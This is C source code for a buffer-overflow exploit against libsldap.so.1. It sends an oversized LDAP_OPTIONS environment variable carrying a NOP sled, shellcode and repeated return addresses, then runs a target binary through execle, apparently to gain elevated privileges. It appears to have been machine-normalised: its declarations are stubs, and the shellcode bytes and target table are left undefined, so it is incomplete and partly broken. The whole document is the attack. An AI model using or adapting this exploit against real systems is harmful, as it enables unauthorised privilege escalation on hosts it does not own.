
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* string; int retaddr; int path; } ;


 size_t ADJUST ;
 size_t atoi (char*) ;
 int* egg ;
 int envs ;
 int execle (int ,char*,char*,int ) ;
 int exit (int ) ;
 int fprintf (int ,char*,char*) ;
 size_t i ;
 int* ldap ;
 int memcpy (int*,char*,int) ;
 int memset (int*,int,int) ;
 int ret_adr ;
 int* shellcode ;
 int stderr ;
 int strlen (int*) ;
 TYPE_1__* target ;

main(int argc, char *argv[])
{

      if(!argv[1])
      {
              fprintf(stderr, "libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow\nExploit code: noir@gsu.linux.org.tr\nBug discovery: sway@hack.co.za\n\nUsage: %s target#\n\n", argv[0]);

      for(i = 0; target[i].string != ((void*)0); i++)
      fprintf(stderr,"target#: %s\n", target[i].string);
      exit(0);
      }

  ret_adr = target[atoi(argv[1])].retaddr;

  memset(egg, 0x00, sizeof egg);
  for(i = 0 ; i < 400 - strlen(shellcode) ; i +=4)
  *(long *)&egg[i] = 0xa61cc013;
  for (i= 0 ; i < strlen(shellcode); i++)
     egg[200+i]=shellcode[i];

 for ( i = 0; i < ADJUST; i++) ldap[i]=0x58;
 for (i = ADJUST; i < 4000; i+=4)
    {
      ldap[i+3]=ret_adr & 0xff;
      ldap[i+2]=(ret_adr >> 8 ) &0xff;
      ldap[i+1]=(ret_adr >> 16 ) &0xff;
      ldap[i+0]=(ret_adr >> 24 ) &0xff;
    }
memcpy(ldap, "LDAP_OPTIONS=", 13);

ldap[strlen(ldap) - 3] = 0x00;

execle(target[atoi(argv[1])].path, "12341234", (char *)0, envs);

}
